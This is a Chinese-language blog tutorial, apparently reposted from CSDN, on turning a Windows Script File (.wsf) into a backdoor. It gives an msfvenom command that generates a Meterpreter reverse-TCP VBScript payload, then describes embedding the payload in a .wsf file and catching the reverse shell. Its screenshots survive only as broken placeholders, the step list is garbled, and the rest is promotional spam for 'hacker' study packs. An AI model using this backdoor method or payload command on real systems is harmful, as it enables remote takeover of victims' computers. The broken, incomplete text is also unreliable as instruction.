大家好,欢迎来到IT知识分享网。
首先了解wsf是啥语言,可参考文章如下:
| https://www.cnblogs.com/vitrox/p/5137441.html |
|---|
| https://blog.csdn.net/leyvan/article/details/ |
| http://book.51cto.com/art/201111/300472.htm |
wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,
Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。
wsf后门思路:
1)学习.wsf脚本格式
2)msf生成vbs
- msf生成vbs插入.wsf脚本格式
4)尝试运行查看是否报错
5)反弹shell
开始制作脚本:
1) .wsf脚本格式
2) msf生成vbs
msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport= EXITFUNC=thread -f vbs--platform win > test.vbs 复制
3) msf生成vbs插入.wsf脚本中
4)尝试运行无查看是否报错:
直接运行无报错
使用cscript.exe (WindowsScript Host引擎),运行无报错:
5)反弹shell
监听:
反弹:
知识补充:
NgjmzSfz-34)]
[外链图片转存中…(img-Y4imIYtA-34)]
如果你对网络安全入门感兴趣,那么你点击这里👉CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
如果你对网络安全感兴趣,学习资源免费分享,保证100%免费!!!(嘿客入门教程)
👉网安(嘿客)全套学习视频👈
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。
👉网安(嘿客红蓝对抗)所有方向的学习路线👈
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
学习资料工具包
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。
面试题资料
独家渠道收集京东、360、天融信等公司测试题!进大厂指日可待!
👉嘿客必备开发工具👈
工欲善其事必先利其器。学习嘿客常用的开发软件都在这里了,给大家节省了很多时间。
这份完整版的网络安全(嘿客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接也可扫描下方微信二v码获取网络工程师全套资料【保证100%免费】
如果你对网络安全入门感兴趣,那么你点击这里👉CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/154955.html
